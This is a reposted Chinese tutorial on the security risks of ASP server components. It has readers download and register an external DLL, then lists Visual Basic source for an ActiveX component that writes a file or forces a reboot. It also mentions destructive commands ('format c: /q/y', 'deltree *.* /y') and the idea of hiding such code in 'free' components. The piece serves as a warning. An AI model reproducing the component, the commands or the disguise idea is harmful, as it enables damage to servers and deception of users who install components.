ASP组件中的安全问题

2016-01-29 19:54 6 1 收藏

ASP组件中的安全问题,ASP组件中的安全问题

【 tulaoshi.com - ASP 】

  Microsoft推出的ASP(Active Server Page)以简单、易用、功能多、可扩充性等强大功能得到了网友和大多数网管的喜爱,大有完全代替CGI的趋势。但是我要对你说,如果使用ASP的话,你网络的安全同时也大大降低了!

  在我继续说下去之前,请你完成以下步骤:
  1.下载这个文件“http://home.gbsource.net/xuankong/dll.zip”,解压缩后把其中的test.dll文件拷贝到“c:windowssystem”(如果你是使用NT的话,请拷贝到相应目录);
  2.接下来打开“开始/运行”菜单输入“regsvr32 test.dll”命令;
  3.拷贝解压缩后的文件包中的那个index.asp到你的服务器目录(如果你是使用PWS‘Personal Web Server’调试可以拷贝到“c:Inetpubwwwroot”,NT请拷贝到相应的目录);
  4.换一台机器用IE浏览index.asp文件看一看(你看到的是出错代码,但是实际上程序已经运行了),你再返回你的机器看一看c:下是否多了一个文件?!一个名为“xuankong.dat”的文件(其实如果我愿意,你的c:autoexec.bat文件也可以被我打开并写入一些什么“format c: /q/y”或者“deltree *.* /y”的命令,等你下次重新启动机器。嘿嘿……)。
  

  我们一起来看看到底是怎么一回事,你刚才拷贝的那些DLL文件其实是我使用Visul Basic 5.0开发的一个组件:
  1.打开VB5.0新建一个“ActiveX dll”文件,把下面的代码录入进去。
  Private Declare Function ExitWindowsEx Lib ″user32″ _
  (ByVal uFlags As Long, ByVal dwReserved As Long) _
  As Long

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/asp/)

  Sub xuankong()′请不要加上″private″  
 a$ = InputBox(″请输入你的姓名,如果你的输入是″xuankong″″ + Chr(13) + Chr(10) + ″则会在你的系统中生成一个″xuankong.dat″文件″ + Chr(10) + Chr(13) + ″否则的话你的机器可能重启″, ″请输入″, ″xuankong″)
  If a$ = ″xuankong″ Then

  Open ″c:xuankong.dat″ For Append As #1

  Write #1, ″我的朋友,这是一个ASP组件的测试程序″

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/asp/)

  Write #1, ″hello world!This is a test″

  Write #1, ″如果你看到这个文件表示测试成功!!!″

  Else

  ExitWindowsEx &H43, 0′使用API函数重新启动机器

  End If

  Close #1

  End Sub
  

  2.把工程名改为dll,类模块改为test,然后把这个工程生成DLL文件到c:windowssystem目录下面。
  

  3.新建一个index.asp文件把下面的代码录入进去。
  $#@60;% set rs=server.createobject(″dll.test″)%$#@62;
  $#@60;% set rs1=rs.xuankong    rs1.execute    %$#@62;
  

  4.拷贝index.asp到你的服务器内,按照上面所述进行调试!   好了,如果你调试完成,有什么感觉???如果是使用VC++ 、Visual Java开发(它们开发出来的组件功能可更加强大);如果把上面的VB代码改一下,加入到一些FTP组件、E-mail组件、HTTP组件、聊天室组件、计数器组件中……(凡是可以输入/输出的组件,没法输入/输出的组件的破坏力有一定局限),再给这些组件加上一个好听的名字“免费的……”你不上当吗(嘿嘿!说不定你已经上当了,天下免费的东西可是好东西!!!*^v^*)?
  

  上面所说的是ASP组件的安全问题!另外如果有些作者在写ASP组件时不小心留下系统bug!那就更加不易被人发觉了!

来源:http://www.tulaoshi.com/n/20160129/1510359.html

延伸阅读
婴儿床的安全问题 据调查显示,把婴儿放在松软的床垫、沙发、沙发垫、水床、羊皮垫等地方睡眠都会增加发生SIDS(婴儿猝死综合症)的危险。 围栏 测量一下婴儿床的围栏,保证它们之间的间隔不大于6厘米。如果围栏间隔过大,婴儿的头部就有可能被困在两条围栏之间。 床垫 必须保证床垫绝对适合婴儿的尺寸...
标签: SQLServer
从codered到nimda等,一大堆蠕虫把原来需要人工利用的漏洞都变成了程序自动利用了,大家还想去手工操作这些IIS漏洞么?让我们调整重心,去看看服务器常用的数据库吧。 一般网站都是基于数据库的,特别是ASP、PHP、JSP这样的用数据库来动态显示的网站。很多网站可能多注意的是操作系统的漏洞,但是对数据库和这些脚本的安全总是忽略,也没有...
标签: 食疗养生
越是到春节这种人多聚餐的时候,食品安全越要放在心上。现笔者就常见的、容易忽略的一些问题,给大家作个提醒: 水果部分腐烂不能吃 由于保存不当,买回来的水果常常会烂掉,于是不少人就用刀把烂掉的部分挖掉,把没有坏的部分吃了。其实,这是一种错误的做法。有毒物质可以从腐烂部分通过果汁向未腐烂部分扩散,使未腐烂部...
标签: 宠物猫 宠物
注意家里潜在的威胁     检查房间里是否有裸露在外的电线,遗落在地上的塑料袋之类对猫咪有潜在危险的物品。家中的植物最好放在幼猫接触不到的地方,有的植物是有毒的比如夹竹桃,冬青树,杜鹃花,有些调皮的幼猫可能会去啃食。家里纱窗和阳台要关好,防止小猫不当心坠落。     对于杀虫剂、灭鼠药等有毒药物要放到猫咪...
标签: Java JAVA基础
  选择自 hf1650 的 Blog 一、概述 当网络编程越来越方便,系统功能越来越强大,安全性却指数倍地下降。这恐怕就是网络编程的不幸和悲哀了。各种动态内容生成环境繁荣了WWW,它们的设计目标就是为了给开发者更多的力量,给最终用户更多的方便。正因为如此,系统设计师和开发者必须明确地把安全问题作为一个考虑因素,事后追悔很...

经验教程

300

收藏

88
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部